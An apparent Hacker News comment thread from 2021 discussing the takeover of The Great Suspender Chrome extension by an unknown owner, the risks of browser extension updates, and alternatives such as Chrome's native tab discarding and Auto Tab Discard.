Funnily enough, Google mentions The Great Suspender as | inspiration for this feature in the August 2015 changelog: | https://developers.google.com/web/updates/2015/09/tab-discar... | | > We actually had a great chat with the author of the Great | Suspender extension while developing tab discarding and they're | glad to see us natively tackling this problem in ways that are | more efficient than an extension might be able to, such as | losing the state of your user inactions. | dbbk wrote: | The functionality is built-into Chrome, the native tab | discarding just happens when it thinks memory pressure is too | high. Extensions like this give you extra granularity to set it | to happen after a timer. | MacroChip wrote: | Does this extension add functionality beyond Chrome's existing | tab suspension? | jeromeparadis wrote: | There's a reason why I don't install any extension except a | password manager. | otterpro wrote: | Wow, this is why just recently my Macbook pro was registering | high CPU usage even when all tabs were asleep using Great | Suspender. For some reason, Chrome was registering high CPU | usage, and I thought it was some Chrome bug. | michaelcampbell wrote: | You lost me. What's this "this" in "this is why", exactly? | angryasian wrote: | there really needs to be a better bookmarking solution. | asadkn wrote: | I have always used The Great Discarder instead [1] | | It's by the same dev too but it uses Chrome's Native Tab | Discarding feature and I found it way more efficient (at the time | I started using it a few years ago - haven't compared recently). | | [1] https://chrome.google.com/webstore/detail/the-great- | discarde... | monkpit wrote: | I like the idea of using the discard mechanism, but if it's | from the same developer, wouldn't it be at risk of having the | same thing happen? | asadkn wrote: | True that's possible if it were to get popular. But since | this wasn't the popular extension, it'd seem it wasn't sold | off. | shawnz wrote: | Great Suspender eventually added functionality to use Chrome's | native tab discarding as well and so they stopped updating | Great Discarder. | pjmlp wrote: | I just don't use extensions, so no need to worry about such | scenarios. | StellarTabi wrote: | The lack of user control, lock files, granularity of controls | over browser extensions has gone too far. | Aardwolf wrote: | Doesn't chrome already suspend background tabs without plugin? At | least I'm unable to properly have browser games running unless | they're in a visible tab. | rolfvandekrol wrote: | Browser games, implemented in Javascript, usually depend on | requestAnimationFrame, which is not executed in background | tabs. See https://developer.mozilla.org/en- | US/docs/Web/API/window/requ... for more info. | mtoddsmith wrote: | Seems there should be an extension which checks other extensions | for nefarious activity or notifies you of the events that are | mentioned in the article. | dr-detroit wrote: | You've heard of first world problems this is Martian problems | like seriously you cant manage chrome tabs yourself | istorical wrote: | anyone able to compare Tiny Suspender and Auto Tab Discard? | qwerty456127 wrote: | By the way, is there an extension (I'm interested in both Firefox | and Chrome) which would force all the new (background) tabs to be | created in the suspended state (like if you had opened them in | background and then restarted the browser) and only start loading | after you actually open them? | kchr wrote: | Same here! | gneray wrote: | Ditto | vmception wrote: | Uninstalled and reported. | orliesaurus wrote: | Lifehack: export your suspended tabs as a flat file through the | interface, uninstall the add on, then follow the downgrade as the | blog suggests, at the end reimport your tabs from the flat file | AQXt wrote: | > Apparently recent versions of this extension have been taken | over by a shady anonymous entity... | | That's something that worries me, whenever I install a software | with trusted privileges. | | Software companies can sell their products -- and user base -- to | other companies without notice. | | And it can be even worse in the free software world: think about | all the updates that happen when you type `apt- | get|yum|brew|npm|pip update`. What are the odds of a single | dependency being taken over by a shady anonymous entity? | [deleted] | acdha wrote: | This is why I stopped using extensions in any browser years ago | unless it came from a trusted company I pay directly (i.e. | 1Password). The broken economic model means that the developers | always have pressure to cash in on a popular extension and Google | has set things up to make abuse fast and easy with automatic | silent updates and their usual skimping on human review. By the | time the news about TGS came out most users already had the next | release installed. | jeffbee wrote: | Indeed. There was never a basis for trusting The Great | Suspender in the first place. "Read and change all your data" | is a permission that should be reserved for code you wrote | yourself. | Centigonal wrote: | More discussion on GitHub: | https://github.com/greatsuspender/thegreatsuspender/issues/1... | | Quite similar to what happened to Nano Adblocker/Defender a few | months ago. | [deleted] | gruez wrote: | previous discussion: | https://news.ycombinator.com/item?id=25622015 | [deleted] | jancsika wrote: | > Disable analytics tracking by opening the extension options for | The Great Suspender and checking the box "Automatic deactivation | of any kind of tracking". | | > Pray that the shady developer doesn't issue a malicious update | to The Great Suspender later. (There's no sensible way to disable | updates of an individual extension.) | | Does Debian ship packages for individual browser extensions? | | I mean, if they do I'm sure it's not scalable and-- after | spending time reading debuild manual-- a giant, archaic pain in | the ass. | | On the other hand, all these app delivery systems are so damned | pernicious and require constant vigilance. We may have arrived at | a moment in time where this is actually a difficult decision: | | * pay somebody a living wage to burrow down into Debian's WoT | bureaucracy and add at least a selection of this functionality | _without_ phoning home | | * continue playing the most tedious game of whackamole with a | whackamole game that mines all our data in order to learn how | best to beat all users at whackamole | [deleted] | vaduz wrote: | > Does Debian ship packages for individual browser extensions? | | They do, for a couple of more notable ones (HTTPS Everywhere, | uBlock Origin, Proxy Switcher, etc.) [0] | | > I mean, if they do I'm sure it's not scalable and-- after | spending time reading debuild manual-- a giant, archaic pain in | the ass. | | The biggest problem is to find a person to be a maintainer that | is willing to keep up with the upstream development. | | [0] | https://packages.debian.org/search?keywords=webext-&searchon... | wintermutestwin wrote: | At this point, I would gladly pay good money for a browser that | prevented ads and tracking, provided most of the standard plugin | functionality oob and vetted the rest. This whole mess is a | massive time suck. | [deleted] | abecedarius wrote: | I'm using Brave. Not sure it exactly matches what you want, but | it's the closest I've found. | skrowl wrote: | Just sent him this email: | | Saw your article via HN. | | As an easier permanent fix, just uninstall The Great Suspender | and install Auto Tab Discard (https://add0n.com/tab- | discard.html). It does the same thing. | | It's available on: | | Firefox - Auto Tab Discard - Get this Extension for Firefox (en- | US)(https://addons.mozilla.org/en-US/firefox/addon/auto-tab- | disc...) | | Edge - Auto Tab Discard - Microsoft Edge Addons | (https://microsoftedge.microsoft.com/addons/detail/auto-tab-d...) | | or even if you're still using Chrome - Auto Tab Discard - Chrome | Web Store (https://chrome.google.com/webstore/detail/auto-tab- | discard/j...) | jschuur wrote: | Discarding inactive tabs is not what I use The Great Suspender | for. I use it to... suspend tabs. Auto Tab Discard doesn't seem | to do that. | shawnz wrote: | Discarding the tab is superior to what Great Suspender used | to do. Why would you want the old behaviour? | | Tab discarding is just a more efficient, native | implementation of what Great Suspender aimed to do in the | first place. | Arnavion wrote: | I don't use Chrome so I have no idea what either of these | extensions did, but FF's implementation of tab discarding | causes it to reload the page when I switch to the tab, | which means I have to wait for the page to load before I | can do whatever I wanted to do. | | I'd much rather have a way to just stop all JS on a | "suspended" tab so that FF doesn't burn 20% CPU on tabs | that aren't even visible. (Yes I'm aware that JS timers, | etc operate at reduced frequency for unfocused tabs. I'm | talking about stopping them entirely.) Discarding may be | more efficient for the browser but it's less efficient for | me the user, so I don't use it. | shawnz wrote: | Fair enough, although that is not what Great Suspender | did. Great Suspender also causes the page to be reloaded | on resumption, just like an early version of tab | discarding. | | Tab discarding does have the slight advantage that it | remembers what you typed in on the page and where you | were scrolled (but nonetheless still causes a reload). | | What you are asking for regarding slowing the performance | of background JS is something browsers already do: | https://stackoverflow.com/questions/15871942/how-do- | browsers... | | Making that behaviour more aggressive seems like it is | liable to cause significant problems to the user | experience with minimal benefits. E.g. background media | playback would likely be broken, notifications, etc. | Whereas you could simply use bookmarks instead of open | tabs to get the same effect | Arnavion wrote: | >What you are asking for regarding slowing the | performance of background JS is something browsers | already do | | As I wrote: | | >>(Yes I'm aware that JS timers, etc operate at reduced | frequency for unfocused tabs. I'm talking about stopping | them entirely.) | | >Making that behaviour more aggressive seems like it is | liable to cause significant problems to the user | experience with minimal benefits. E.g. background media | playback would likely be broken, notifications, etc. | | I want none of those things from the "suspended" tabs. | | >Whereas you could simply use bookmarks instead of open | tabs to get the same effect | | How? Do you mean I would load the bookmark into a new tab | when I wanted to visit it? That not only has the same | problem that I described for discarded tabs (have to wait | for a page load), but is even worse because it loses all | the context that discarded tabs do retain. Not to mention | the annoyance of maintaining bookmarks for arbitrary tab | groups that I just happen to have open. | [deleted] | [deleted] | loceng wrote: | Ah damn, I was about to try it to see if it actually | discarded or suspended tabs. | fudged71 wrote: | What is the difference? | | From the website it sounds like the favicon is changed. So | the tab doesn't go away it's just on pause | | Google: " a discarded tab doesn't go anywhere. We kill it but | it's still visible on the Chrome tab strip. If you navigate | back to a tab that's been discarded, it'll reload when | clicked. Form content, scroll position and so on are saved | and restored the same way they would be during | forward/backward tab navigation." | | In the future this will be updated to also use a serializer | for discarded tabs. | kchr wrote: | Discard doesn't mean "remove" in this context. It will unload | the tab, but still keep the state for when you switch back to | it. E.g. suspend it. | nguyenkien wrote: | Edge (dev) has built-in sleep tabs. It work quite good | michaelcampbell wrote: | I wish they had one that would do that based on memory or CPU | usage of a tab. | spiffytech wrote: | Auto Tab Discard has a setting, "Discard a background tab if | its memory usage (totalJSHeapSize) exceeds (in MB)" | michaelcampbell wrote: | Greyed out for me in FF. =\ | tyingq wrote: | I'm now curious how much money the original developer was paid to | hand it over. I imagine he/she knew what the buyer's plan was. | probably_wrong wrote: | According to the homepage of a company that buys apps, and as a | first approximation, that would be "anywhere between 8x - 36x | monthly revenue for apps. In most cases this is well above the | standard market value of 6-12x". | | Whether they are lowballing candidates with that offer, I can't | say. | iamspoilt wrote: | Uninstalled. Period. | [deleted] | jakobpb wrote: | Uh, just use Firefox. Problem solved for both functionality and | security. | dstick wrote: | More detailed information can be found here: | https://github.com/greatsuspender/thegreatsuspender/issues/1... ___________________________________________________________________ (page generated 2021-01-20 23:00 UTC)